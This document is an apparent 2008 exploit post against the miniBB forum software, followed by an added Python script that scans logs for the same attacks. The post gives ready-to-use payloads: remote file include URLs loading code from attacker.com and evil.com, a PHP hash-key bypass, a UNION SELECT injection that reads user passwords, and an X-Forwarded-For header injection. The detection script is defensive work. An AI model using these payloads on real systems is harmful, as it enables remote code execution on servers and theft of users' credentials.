
12.01.2008, 18:37
miniBB <=1.5a
Type: Remote File Include Vulnerabilities
Bug: com_minibb.php & index.php
Author: Ahmad Maulana a.k.a Matdhule
Exploit:
http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php?absolute_path= http://attacker.com/evil.txt?
miniBB <= 2.x
Remote/local file include.
PHP<= 4.4.3, 5.1.4 Zend_Hash_Del_Key_Or_Index
includeHeader
Value:
PHP 4 -269001946
PHP 5 -834358190
Exploit: http://server/miniBB/index.php?includeHeader=http://www.evil.com/?&-269001946=1&-834358190=1
[miniBB unknown]
SQL-inj
Exploit: http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select% 201,2,user_password%20from%20minibb_users/*
miniBB 2.x
Database table prefix disclosure, IP ban bypass.
PHP ip2long() function circumvention
Exploit: X-FOWARDED-FOR: 1[CHR(9)]'[SQL CODE]
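
For anyone reviewing logs of an old miniBB install, the request patterns listed in the post can be matched with a short script. This is an added example, not part of the original post and not miniBB code; the function name `check_request`, the finding labels, the assumption that `user` is a numeric id, and the sample hosts are all constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names and hash-key values are the ones listed in the post above.
INCLUDE_PARAMS = {"absolute_path", "includeHeader"}
HASH_KEYS = {"-269001946", "-834358190"}  # PHP 4 / PHP 5 values
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)  # value starts with a URL scheme


def check_request(url, headers=None):
    """Return a sorted list of findings for one logged request."""
    findings = set()
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    for key, value in params:
        # An include-path parameter should never carry a URL.
        if key in INCLUDE_PARAMS and SCHEME.match(value):
            findings.add("include-param-url:" + key)
        # Query keys equal to the Zend_Hash_Del_Key_Or_Index values.
        if key in HASH_KEYS:
            findings.add("zend-hash-key")
    query = dict(params)
    # Assumption: the userinfo action expects a purely numeric user id.
    if query.get("action") == "userinfo" and not query.get("user", "0").isdigit():
        findings.add("userinfo-nonnumeric-user")
    # Header names are case-insensitive; every hop must parse as an IP address,
    # which rejects tabs, quotes and anything else appended to the value.
    lowered = {k.lower(): v for k, v in (headers or {}).items()}
    xff = lowered.get("x-forwarded-for")
    if xff is not None:
        for hop in xff.split(","):
            try:
                ipaddress.ip_address(hop.strip(" "))
            except ValueError:
                findings.add("xff-not-an-ip")
    return sorted(findings)


if __name__ == "__main__":
    # Constructed sample requests (hosts are placeholders).
    samples = [
        ("http://forum.example/index.php?action=userinfo&user=12",
         {"X-Forwarded-For": "203.0.113.7"}),
        ("http://forum.example/index.php?includeHeader=http://files.example/h.txt"
         "&-269001946=1", {}),
        ("http://forum.example/index.php", {"X-Forwarded-For": "1\t'x"}),
    ]
    for url, hdrs in samples:
        print(check_request(url, hdrs) or "clean", url)
```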